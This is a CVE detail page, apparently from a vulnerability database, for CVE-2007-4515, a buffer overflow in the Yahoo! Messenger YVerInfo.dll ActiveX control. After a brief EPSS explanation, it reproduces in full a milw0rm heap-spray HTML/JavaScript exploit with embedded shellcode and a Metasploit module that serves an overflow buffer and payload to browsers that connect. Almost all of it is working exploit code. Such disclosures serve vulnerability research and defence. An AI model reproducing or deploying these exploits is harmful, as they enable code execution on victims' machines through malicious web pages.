CVE-2007-4515 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<!-- Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX Control Buffer Overflows update YM : http://messenger.yahoo.com/security_update.php?id=082907 Functions : fvcom or info; RegKey Safe for Script: True RegKey Safe for Init: True -> that functions are safely scriptable and exploitable by HeapSpray Technique Tested : Windows XP Professional SP2 all patched,Internet Explorer 7 That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -> I used "Simple DNS Plus" for manipulating the DNS resolution. I saved this file (exploit.htm) into directory root (web server) and I exploited with link : http://www.yahoo.com/exploit.htm coder : minhbq mail : minhbq1985@gmail.com --> <html> <!-- CLSID of YverInfo.dll --> <object classid="CLSID:D5184A39-CBDF-4A4F-AC1A-7A45A852C883" id="target"></OBJECT> <SCRIPT language="javascript"> // HeapSpray - execute calculator shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<800;i++) memory[i] = block + shellcode; var buffer = unescape("%0D"); while (buffer.length< 10000) buffer+=unescape("%0D"); // Vulnerability of method fvcom target.fvcom(buffer); </script> </html> # milw0rm.com [2007-09-01]

## # $Id: yahoomessenger_fvcom.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2007-4515' ], [ 'OSVDB', '37739' ], [ 'BID', '25494' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ], # Tested on fully patched XPSP2 9/29/07 ], 'DisclosureDate' => 'Aug 30 2007', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) # Set the exploit buffer sploit = rand_text_english(411) + [target.ret].pack('V') sploit << p.encoded + rand_text_english(payload.encoded.length) # Build out the message content = %Q| <html> <object classid='clsid:D5184A39-CBDF-4A4F-AC1A-7A45A852C883' id='#{vname}'></object> <script language='javascript'> #{strname} = new String('#{sploit}'); #{vname}.fvcom(#{strname}); </script> </html> | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end